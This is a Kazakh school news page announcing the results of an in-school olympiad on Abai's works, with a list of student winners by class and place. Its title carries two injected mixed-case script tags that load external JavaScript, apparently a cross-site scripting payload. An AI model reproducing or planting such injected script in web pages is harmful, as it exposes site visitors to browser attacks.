«Абайтану» мектепішілік олимпиаданың қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.12.2021

      М.Әуезовтің «Абай жолы» роман-эпопеясын толық меңгеру арқылы кемеңгердің ақындық болмысына үңілу, Абайдың шығармашылық өмірінен ғибрат алу, өмірде қолдана алуға бағыттау, оқушылардың зияткерлік және шығармашылық қабілеттерін дамыту мақсатында ағымдағы жылдың 8-9 желтоқсан күндері мектебімізде «Абайтану» олимпиадасы өтті. Олимпиадаға 8-11-сынып оқушылары қатысты. Олимпиада екі айналымнан тұрды. 1-айналымда оқушылар Абай қарасөздері мен поэзиясы негізінде дайындалған тақырыптардың біріне эссе жазды,  2-айналымда М. Әуезовтің «Абай жолы» романы бойынша тапсырмалар орындады. 
Олимпиаданың 1-2-айналымдарының қорытындысы бойынша: 
Кәрім Аружан, 8а-сын. 1-орын 
Дулатова Алуа, 9б-сын. 1-орын
Жылқыбай Айсара, 10а-сын. 1-орын
Сулейменова Гүлшекер,11б-сын. 1-орын
Блиспекова Жұлдыз, 9а-сын. 2-орын
Хойшыбай Назым, 10а-сын. 2-орын
Бекмолдина Жанерке, 10а-сын. 2-орын 
Билялова Алика, 11а- сын. 2-орын
Әділбай Ақбаян, 10б-сын. -3-орын
1-орынға иеленген  9-11-сынып оқушылары қаңтар айында өтетін республикалық «Абайтану» олимпиадасына қатысады.

Просмотров: 760


Пікір қосу



Деректерді қолтаңбаға қосу